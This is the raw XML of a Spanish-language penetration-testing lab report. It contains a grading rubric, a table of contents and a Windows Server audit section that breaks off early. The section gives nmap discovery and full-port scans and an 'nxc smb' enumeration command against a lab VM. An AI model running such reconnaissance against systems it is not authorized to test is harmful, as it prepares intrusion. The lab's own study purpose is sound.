            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EF696D5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Bueno</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E47FFC" w:rsidRPr="002E6AEB" w14:paraId="35FA91C8" w14:textId="77777777" w:rsidTr="00D81CE1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="499C82E0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60%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1455ADD5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Regular</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E47FFC" w:rsidRPr="002E6AEB" w14:paraId="145A110A" w14:textId="77777777" w:rsidTr="00D81CE1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68B7717B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40%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="608974FE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Limitado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E47FFC" w:rsidRPr="002E6AEB" w14:paraId="157D6214" w14:textId="77777777" w:rsidTr="00D81CE1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E4C5B29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20%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32522C61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6AEB">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Debe mejorar bastante</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E47FFC" w:rsidRPr="002E6AEB" w14:paraId="05503F1B" w14:textId="77777777" w:rsidTr="00D81CE1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06284EC5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2E6AEB">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53628334" w14:textId="77777777" w:rsidR="00E47FFC" w:rsidRPr="002E6AEB" w:rsidRDefault="00E47FFC" w:rsidP="00D81CE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2E6AEB">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Inaceptable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40BB2102" w14:textId="3B496BB7" w:rsidR="00E47FFC" w:rsidRDefault="00E47FFC" w:rsidP="00E47FFC">
      <w:pPr>
        <w:pStyle w:val="TtuloTDC"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="610E2801" w14:textId="03CF1AF2" w:rsidR="00E345C6" w:rsidRDefault="00E345C6" w:rsidP="00E345C6"/>
    <w:p w14:paraId="06EC543C" w14:textId="77777777" w:rsidR="00E47FFC" w:rsidRDefault="00E47FFC" w:rsidP="00E345C6"/>
    <w:p w14:paraId="41829C93" w14:textId="77777777" w:rsidR="00E47FFC" w:rsidRDefault="00E47FFC" w:rsidP="00E345C6"/>
    <w:p w14:paraId="638A4495" w14:textId="77777777" w:rsidR="00E47FFC" w:rsidRDefault="00E47FFC" w:rsidP="00E345C6"/>
    <w:p w14:paraId="2BDA25AF" w14:textId="77777777" w:rsidR="00E47FFC" w:rsidRDefault="00E47FFC" w:rsidP="00E345C6"/>
    <w:p w14:paraId="592C2589" w14:textId="77777777" w:rsidR="00E47FFC" w:rsidRDefault="00E47FFC" w:rsidP="00E345C6"/>
    <w:p w14:paraId="22CC6384" w14:textId="77777777" w:rsidR="00E47FFC" w:rsidRDefault="00E47FFC" w:rsidP="00E345C6"/>
    <w:p w14:paraId="5ED35F94" w14:textId="77777777" w:rsidR="00E47FFC" w:rsidRDefault="00E47FFC" w:rsidP="00E345C6"/>
    <w:p w14:paraId="0C0BAD77" w14:textId="77777777" w:rsidR="00E47FFC" w:rsidRDefault="00E47FFC" w:rsidP="00E345C6"/>
    <w:p w14:paraId="278F092F" w14:textId="77777777" w:rsidR="00E47FFC" w:rsidRDefault="00E47FFC" w:rsidP="00E345C6"/>
    <w:p w14:paraId="3FBFC688" w14:textId="77777777" w:rsidR="00E47FFC" w:rsidRDefault="00E47FFC" w:rsidP="00E345C6"/>
    <w:p w14:paraId="42CA9AA0" w14:textId="77777777" w:rsidR="00E47FFC" w:rsidRDefault="00E47FFC" w:rsidP="00E345C6"/>
    <w:p w14:paraId="5B13961B" w14:textId="77777777" w:rsidR="00E47FFC" w:rsidRDefault="00E47FFC" w:rsidP="00E345C6"/>
    <w:p w14:paraId="57008AF9" w14:textId="77777777" w:rsidR="00E47FFC" w:rsidRDefault="00E47FFC" w:rsidP="00E345C6"/>
    <w:p w14:paraId="598700D2" w14:textId="77777777" w:rsidR="00D82978" w:rsidRDefault="00D82978" w:rsidP="00D82978">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:bookmarkStart w:id="1" w:name="_Toc214392891" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:id w:val="8963952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6F2535" w14:textId="193A654D" w:rsidR="00D82978" w:rsidRDefault="00D82978" w:rsidP="00D82978">
          <w:pPr>
            <w:pStyle w:val="Ttulo1"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="0"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:t>Contenido</w:t>
          </w:r>
          <w:bookmarkEnd w:id="1"/>
        </w:p>
        <w:p w14:paraId="2F54B07E" w14:textId="16AB698A" w:rsidR="00180466" w:rsidRDefault="00D82978">
          <w:pPr>
            <w:pStyle w:val="TDC1"/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92891" w:history="1">
            <w:r w:rsidR="00180466" w:rsidRPr="007B6295">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Contenido</w:t>
            </w:r>
            <w:r w:rsidR="00180466">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00180466">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00180466">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214392891 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00180466">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00180466">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00180466">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00180466">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5F039CA0" w14:textId="1B93D709" w:rsidR="00180466" w:rsidRDefault="00180466">
          <w:pPr>
            <w:pStyle w:val="TDC1"/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14392892" w:history="1">
            <w:r w:rsidRPr="007B629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9193" w14:textId="3C504B3F" w:rsidR="00180466" w:rsidRDefault="00180466">
          <w:pPr>
            <w:pStyle w:val="TDC1"/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14392893" w:history="1">
            <w:r w:rsidRPr="007B6295">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Capítulo 1 Análisis Gin and Ju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7A03" w14:textId="58C9F4B0" w:rsidR="00180466" w:rsidRDefault="00180466">
          <w:pPr>
            <w:pStyle w:val="TDC1"/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14392894" w:history="1">
            <w:r w:rsidRPr="007B6295">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Capítulo 2 Reporte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951D" w14:textId="2A9FBE69" w:rsidR="00180466" w:rsidRDefault="00180466">
          <w:pPr>
            <w:pStyle w:val="TDC1"/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14392895" w:history="1">
            <w:r w:rsidRPr="007B629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6106" w14:textId="78D75312" w:rsidR="007F544B" w:rsidRDefault="00D82978" w:rsidP="00D82978">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="6C627E9E" w14:textId="77777777" w:rsidR="00D82978" w:rsidRDefault="00D82978" w:rsidP="00D82978">
      <w:bookmarkStart w:id="2" w:name="_Toc210457153"/>
    </w:p>
    <w:p w14:paraId="2964FF8E" w14:textId="77777777" w:rsidR="00D82978" w:rsidRDefault="00D82978" w:rsidP="00D82978"/>
    <w:p w14:paraId="548BCE39" w14:textId="77777777" w:rsidR="00D82978" w:rsidRDefault="00D82978" w:rsidP="00D82978"/>
    <w:p w14:paraId="6B65C9D6" w14:textId="77777777" w:rsidR="00D82978" w:rsidRDefault="00D82978" w:rsidP="00D82978"/>
    <w:p w14:paraId="1940E0DB" w14:textId="77777777" w:rsidR="00D82978" w:rsidRDefault="00D82978" w:rsidP="00D82978"/>
    <w:p w14:paraId="1660338A" w14:textId="77777777" w:rsidR="00D82978" w:rsidRDefault="00D82978" w:rsidP="00D82978"/>
    <w:p w14:paraId="0EE219F6" w14:textId="77777777" w:rsidR="00D82978" w:rsidRDefault="00D82978" w:rsidP="00D82978"/>
    <w:p w14:paraId="189D9742" w14:textId="37229E15" w:rsidR="00D82978" w:rsidRDefault="00D82978" w:rsidP="00D82978"/>
    <w:p w14:paraId="0A885F2D" w14:textId="77777777" w:rsidR="00197AF9" w:rsidRDefault="00197AF9" w:rsidP="00D82978"/>
    <w:p w14:paraId="26B9C587" w14:textId="77777777" w:rsidR="00197AF9" w:rsidRDefault="00197AF9" w:rsidP="00D82978"/>
    <w:p w14:paraId="644D30C0" w14:textId="77777777" w:rsidR="00197AF9" w:rsidRDefault="00197AF9" w:rsidP="00D82978"/>
    <w:p w14:paraId="2401A626" w14:textId="77777777" w:rsidR="00D82978" w:rsidRDefault="00D82978" w:rsidP="00D82978"/>
    <w:p w14:paraId="04864CD9" w14:textId="77777777" w:rsidR="00D82978" w:rsidRDefault="00D82978" w:rsidP="00D82978"/>
    <w:p w14:paraId="0E8E3E67" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="00D82978"/>
    <w:p w14:paraId="5438EBB8" w14:textId="77777777" w:rsidR="00D82978" w:rsidRDefault="00D82978" w:rsidP="009A47E0">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70B89309" w14:textId="54DEC56D" w:rsidR="00CE23CB" w:rsidRDefault="00062F8B" w:rsidP="008401E6">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc214392892"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Introducción</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="59C79B95" w14:textId="77777777" w:rsidR="00197AF9" w:rsidRDefault="00197AF9" w:rsidP="00062F8B"/>
    <w:p w14:paraId="56C55565" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="00062F8B"/>
    <w:p w14:paraId="584A88BC" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="00062F8B"/>
    <w:p w14:paraId="61B5BBC8" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="00062F8B"/>
    <w:p w14:paraId="3DA16AE9" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="00062F8B"/>
    <w:p w14:paraId="382B0DBC" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="00062F8B"/>
    <w:p w14:paraId="265766F9" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="00062F8B"/>
    <w:p w14:paraId="279D62C0" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="00062F8B"/>
    <w:p w14:paraId="0FBFCA6E" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="00062F8B"/>
    <w:p w14:paraId="790F7D53" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="00062F8B"/>
    <w:p w14:paraId="79DA64D5" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="00062F8B"/>
    <w:p w14:paraId="2A919E38" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="00062F8B"/>
    <w:p w14:paraId="65BBB61F" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="00062F8B"/>
    <w:p w14:paraId="49369DEB" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="00062F8B"/>
    <w:p w14:paraId="0FCCD06E" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="00062F8B"/>
    <w:p w14:paraId="16DD3FB1" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="00062F8B"/>
    <w:p w14:paraId="16A6D524" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="00062F8B"/>
    <w:p w14:paraId="2E0DBA05" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="00062F8B"/>
    <w:p w14:paraId="043085DB" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="00062F8B"/>
    <w:p w14:paraId="342495D9" w14:textId="77777777" w:rsidR="00197AF9" w:rsidRDefault="00197AF9" w:rsidP="00062F8B"/>
    <w:p w14:paraId="3D2B9597" w14:textId="364F5AD0" w:rsidR="00C660C2" w:rsidRDefault="00E411AC" w:rsidP="00C660C2">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00180466">
        <w:t xml:space="preserve">Revisión con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00180466">
        <w:t>Endpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00180466">
        <w:t xml:space="preserve"> Central</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120B39DF" w14:textId="04E2DBC4" w:rsidR="009655E5" w:rsidRDefault="009655E5" w:rsidP="00180466"/>
    <w:p w14:paraId="7F273798" w14:textId="69A95A59" w:rsidR="009655E5" w:rsidRDefault="009655E5" w:rsidP="009655E5">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C7D9AD4" w14:textId="77777777" w:rsidR="009655E5" w:rsidRDefault="009655E5" w:rsidP="009655E5">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AABE147" w14:textId="77777777" w:rsidR="009655E5" w:rsidRDefault="009655E5" w:rsidP="009655E5">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B02580C" w14:textId="77777777" w:rsidR="009655E5" w:rsidRDefault="009655E5" w:rsidP="009655E5">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7934093F" w14:textId="77777777" w:rsidR="009655E5" w:rsidRDefault="009655E5" w:rsidP="009655E5">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51CA903B" w14:textId="20FBE878" w:rsidR="009655E5" w:rsidRDefault="009655E5" w:rsidP="009655E5">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FCE586C" w14:textId="77777777" w:rsidR="002B0DD1" w:rsidRDefault="002B0DD1" w:rsidP="009655E5">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1237991C" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="009655E5">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7547486D" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="009655E5">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D31EBFA" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="009655E5">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30E0CDDA" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="009655E5">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="045271EC" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="009655E5">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31695612" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="009655E5">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78F81A31" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="009655E5">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00F58BE8" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="009655E5">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44DFDDA0" w14:textId="052AFE1F" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="009655E5">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B68A31F" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="009655E5">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="526BBA36" w14:textId="77777777" w:rsidR="006941CB" w:rsidRDefault="006941CB" w:rsidP="009655E5">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7774B56A" w14:textId="7D4739A4" w:rsidR="002B0DD1" w:rsidRDefault="002B0DD1" w:rsidP="002B0DD1">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00180466">
        <w:t>Auditoría Windows Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F653B1" w14:textId="5C8FFED4" w:rsidR="006941CB" w:rsidRDefault="00BE6E55" w:rsidP="000033DF">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE6E55">
        <w:t>Descubrir la IP del equipo montado en VMware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1185B23B" w14:textId="4CD6BBBD" w:rsidR="00BE6E55" w:rsidRDefault="00BE6E55" w:rsidP="00BE6E55">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE6E55">
        <w:t xml:space="preserve">Ejecutar un escaneo de descubrimiento (Ping </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE6E55">
        <w:t>Scan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE6E55">
        <w:t xml:space="preserve">) con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE6E55">
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0EA9C89F" w14:textId="329052A8" w:rsidR="00BE6E55" w:rsidRPr="00BE6E55" w:rsidRDefault="00BE6E55" w:rsidP="00BE6E55">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE6E55">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE6E55">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE6E55">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE6E55">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>sn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE6E55">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="007C33D2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE6E55">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B2BBC5" w14:textId="420C9C25" w:rsidR="000033DF" w:rsidRDefault="007C33D2" w:rsidP="00504406">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78CF1D0B" wp14:editId="245FD5C5">
            <wp:extent cx="5267325" cy="1885950"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="4601515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158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AC40" w14:textId="17A12F6D" w:rsidR="00504406" w:rsidRPr="00504406" w:rsidRDefault="00504406" w:rsidP="00504406">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00504406">
        <w:t>Identificar la máquina Windows mediante la dirección MAC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00504406">
        <w:t xml:space="preserve">En los resultados del escaneo, busque hosts con MAC </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00504406">
        <w:t>Address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00504406">
        <w:t xml:space="preserve"> de VMware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E9716D" w14:textId="5F93B185" w:rsidR="00504406" w:rsidRPr="00504406" w:rsidRDefault="00504406" w:rsidP="00504406">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ping 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="007C33D2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>5.130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2451E11E" w14:textId="3CAD8248" w:rsidR="00441224" w:rsidRPr="000033DF" w:rsidRDefault="007C33D2" w:rsidP="00BE6E55">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="676BE496" wp14:editId="246230B4">
            <wp:extent cx="4876800" cy="1885950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6827892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923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9E9A" w14:textId="7DBB6215" w:rsidR="006941CB" w:rsidRDefault="007C33D2" w:rsidP="007C33D2">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C33D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C33D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> –disable-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C33D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C33D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-ping -PE -p- 192.168.5.130 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C33D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C33D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> --open --min-rate 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3ABC7A" w14:textId="00766718" w:rsidR="007C33D2" w:rsidRDefault="007C33D2" w:rsidP="007C33D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5DAB94" wp14:editId="5BF207CF">
            <wp:extent cx="5943600" cy="3653790"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1995027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2731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B73" w14:textId="0BD57410" w:rsidR="00F52909" w:rsidRPr="00F52909" w:rsidRDefault="00F52909" w:rsidP="007C33D2">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F52909">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nxc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F52909">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F52909">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F52909">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.5.130</w:t>
      </w:r>
    </w:p>
